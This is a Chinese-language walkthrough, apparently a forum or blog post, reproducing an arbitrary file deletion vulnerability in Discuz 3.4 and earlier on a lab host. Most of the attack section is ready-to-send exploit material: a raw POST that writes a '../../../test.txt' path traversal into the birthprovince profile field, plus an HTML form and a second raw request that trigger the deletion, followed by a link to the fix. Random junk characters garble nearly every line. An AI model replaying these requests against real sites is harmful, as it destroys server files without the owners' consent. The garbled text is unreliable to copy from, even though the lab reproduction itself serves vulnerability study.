|
E$ H# r/ M2 b: L6 h- ~/ V% F% F8 k! O& ]9 s
前言:9月29日,Discuz修复了一个前台任意文件删除的漏洞,相似的漏洞曾在2014年被提交给wooyun和discuz官方,但是修复不完全导致了这次的漏洞。网上很多说官方3.4版本已修复,但我用环境的是vulhub上3.4版本。所以不知道3.4修复没修复直接复现一下。
5 F' ]4 W9 Q2 B' b' } w9 r5 P" g3 f5 j影响版本:Discuz < =3.4 环境3 P% Z' _4 T; h: w: g! u
^3 O; z6 M; H- U复现过程:首先在discuz目录下新建一个test.txt文件,到时候删除用。
* f$ Z6 {, m1 C- C3 p" c5 `新建test.txt A' H( X9 P! g4 Z; s
访问:http://192.168.220.131/home.php?mod=spacecp,然查审查元素,查看formhash的值,然后复制。+ @, n: S7 ~# v+ ], A
/ ^' [) d" a2 }6 T
! p) D7 h1 i0 b
查看formhash3 c( ]$ x! a; ~
利用burp抓包,获取cookie
$ J& w2 f# l: A3 F+ A! K k, J. v1 h0 c
3 F+ f- G5 L) N( ~2 K/ H/ k3 ~
# m3 G: m0 P8 l% h# I) n! O
% x' Y; Z' l% b1 w. x j% x( B
. V- K( W& X; ?& R! Z5 p: X抓取cookie
) p3 T: n* w6 p* N
0 y# i% I+ t6 u* m& @发送下面数据包:修改cookie,formhash,还有删除的文件
9 Q% x1 {; g+ kPOST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1' t" a }6 y% v- |0 p8 b0 n6 X
Host: localhost
% Z7 W/ _* J& M; J/ e0 _Content-Length: 367
8 X& a. x u) h' gCache-Control: max-age=0
& K0 b7 M3 J( Q1 u! v0 fUpgrade-Insecure-Requests: 1
]2 q4 j% h9 D2 n o: _; bContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
9 y8 F" V) \* F3 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
! s7 }% j: M- b/ i9 g7 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
2 T1 l) R8 n+ [! _6 a! MAccept-Encoding: gzip, deflate) V; x/ | M9 K: {- |& b8 ^3 A, u
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6. } w5 E. a+ ]5 R' |9 G2 w
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C15779380561 x2 T) J+ l! X- s
Connection: close
1 Y* I7 C6 C8 U------WebKitFormBoundaryPFvXyxL45f34L12s
A& N% D; z; k" bContent-Disposition: form-data; name="formhash", X9 s* M S/ \" W7 c- h
84a7f376
0 z* S5 O1 L8 G( V2 `------WebKitFormBoundaryPFvXyxL45f34L12s
: t) Z0 n2 T+ MContent-Disposition: form-data; name="birthprovince"5 f" v. B h. L+ r0 L
../../../test.txt
4 i8 ?% J3 `4 @- F% F( U9 ~------WebKitFormBoundaryPFvXyxL45f34L12s" Z( W# L6 a% L
Content-Disposition: form-data; name="profilesubmit"; V! c: ~! h/ @' c
1
5 |, t: S. U6 M3 l6 Y, c: _------WebKitFormBoundaryPFvXyxL45f34L12s--
) F" P: y! j+ f* z5 j' G发送删除的数据包8 U4 h* S3 G3 Q4 N7 j) W& ~, v
刷新页面,查看出生地就会显示成下图所示的状态:
/ M0 S8 S; y" A! K# h8 L' F数据成功写入: @6 `& T3 p, I7 i5 q) }
2 q8 c4 Y# K, o0 N6 f7 O" F
' W3 E' h" S1 g- ?* F$ x3 G说明数据已经进入数据库:
, m0 U$ {# k+ X) t. x a( T, h* Q然后,新建一个upload.html,代码如下,将其中的ip改成discuz的域名,[form-hash]改成你的formhash:
% Y$ d% f1 t4 c! k* A<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST" enctype="multipart/form-data">0 I2 w( M& s- Y9 }+ h" G" W
<input type="file"name="birthprovince" id="file" />& u/ D W0 K, P& K: f" P- J ~
<input type="text"name="formhash" value="84a7f376"/></p>- c( X) }5 `+ W2 k6 a# C+ x3 K' z
<input type="text"name="profilesubmit" value="1"/></p>
$ v* j4 T/ V2 T( k2 O% u<input type="submit"value="Submit" />* h4 A6 `& w1 K1 `7 b
</from>
. ?$ ]4 o+ V, _3 c9 A3 [: u) F- f ^9 [7 I- }6 z6 a
* p8 k0 L" k$ e$ g9 h+ [3 T L
2 n1 S _% d7 o4 Q% p v8 Z
' g4 o1 i# z8 m3 h8 F x. [7 C
4 f" `" ~6 y6 B2 u或者直接构建数据包:
9 I8 H! k8 r0 X C1 ^7 c5 pPOST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.11 H. b+ e" i# L$ U+ `* f0 {5 m- U
Host: 192.168.220.131
- G3 m9 g& Z: e' N( D! s3 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
4 k( w2 g/ N# cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
0 G( |) t5 Z) k# |9 R( mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" P) m8 q! \6 f$ Y/ @Accept-Encoding: gzip, deflate
( K8 C5 [& n8 D7 _1 \3 A4 TContent-Type: multipart/form-data; boundary=---------------------------1238217421187168 n) N1 g* Z& d5 N4 U3 B
Content-Length: 91989
& t, a- i! D/ G' b sConnection: close
, P4 U1 J$ l. S. m. GCookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
" h* F [- Z6 O& RUpgrade-Insecure-Requests: 1
$ l& l, a6 u* m" l& w-----------------------------1238217421187168 k- D# F, T: i9 t
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
( d. @: B( [3 C, [ @Content-Type: image/jpeg7 v1 ~4 \* k. }# t4 U; x# s4 D$ l' I3 z
zerba(这里写啥都可以)1 w) u* Q6 Y% \9 \2 ^0 g& y( W
-----------------------------123821742118716--
. n$ F1 D5 o% \5 d! a: r( c7 \* V" K1 K( B! y
G+ C" ?4 H0 @, }4 \" N$ Q$ ~/ h
s- s/ z2 E. x
1 E# D8 ~4 t f
& v% Q3 C3 n( s1 R; [% Y' Y1 P
/ z$ Q& `; c( V! O6 U; H+ ?1 G* o8 N Y5 Z; e: l- }& D& u x
' X# A, R' X* @: }2 t4 u
- O2 J* T& A! [$ g# ]+ ~3 V5 K7 c4 F
6 B! q$ a; S0 ^% c0 K
进去discuz看看,可以看到,test.txt文件已经被删除了。
* u! J% s6 t; v5 k1 t# D
) h" }# j9 ]* h* n& M! C; g, q2 X5 M# m) A" n( q
; \$ i! G/ _# _' Z2 X& ?) j# b. y; H* c" H% d6 t
& Z3 n+ F5 X' K修复建议:https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
7 P; U- a G+ |" Z; v编辑upload/source/include/spacecp/spacecp_profile.php文件,删除和unlink相关代码。
0 F1 H" i7 I( |! h9 @0 B6 F
' P& K8 ^5 f. X/ u6 v* c7 L g
3 O) S! \$ E% B/ i, h# Y2 c8 p$ Q" E$ q* J4 w1 |
' M1 Q6 u; k% e! G
6 b$ y2 z$ D6 a3 S6 N. ~7 f9 k1 f$ @' Y8 M2 ]# z$ Q. l, M
: i* ^# R9 ?0 R# T2 _3 T3 Y& t1 V+ a) s5 @( h5 M R. X
* r5 r# e4 k, c
|
|